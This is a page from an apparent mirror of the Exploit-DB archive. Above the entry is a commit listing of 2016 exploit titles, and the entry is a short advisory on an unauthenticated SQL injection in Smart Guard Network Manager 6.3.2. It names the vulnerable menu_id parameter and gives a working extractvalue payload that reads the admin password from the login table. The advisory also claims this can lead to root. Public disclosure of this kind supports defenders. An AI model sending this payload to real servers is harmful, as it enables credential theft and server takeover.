bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40904.txt
Offensive Security b080c70f8b DB: 2016-12-14 
7 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Xitami Web Server 5.0a0 - Denial of Service
OpenSSL 1.1.0a/1.1.0b - Denial of Service
Serva 3.0.0 HTTP Server - Denial of Service
iOS 10.1.x - Certificate File Memory Corruption

OpenBSD 4.0 - (vga) Privilege Escalation
OpenBSD 4.0 - 'vga' Privilege Escalation

10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow

MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections
MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections

AShop Deluxe 4.x - (catalogue.php cat) SQL Injection
AShop Deluxe 4.x - 'catalogue.php' SQL Injection

HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion
HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion

CAT2 - (spaw_root) Local File Inclusion
CAT2 - 'spaw_root' Parameter Local File Inclusion

MyBloggie 2.1.3 - search.php SQL Injection
MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting

MyBloggie 2.1.x - Multiple Remote File Inclusion

MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion
MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting
AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting
AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting
Smart Guard Network Manager 6.3.2 - SQL Injection
WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
2016-12-14 05:01:23 +00:00

27 lines
1,005 B
Text
Executable file
Raw Blame History

# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux
Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')
The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
not filtered properly and leads to SQL Injection
Authentication Required: No
SQL injec type- error/xpath.
Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -
So an user can fetch admin details and can easily get root on that server
if server is SmartGuard 6.0A Revolutions as php runs as user root by
default.
This this vulnerability can make whole server vulnerable .
Reference in a new issue View git blame Copy permalink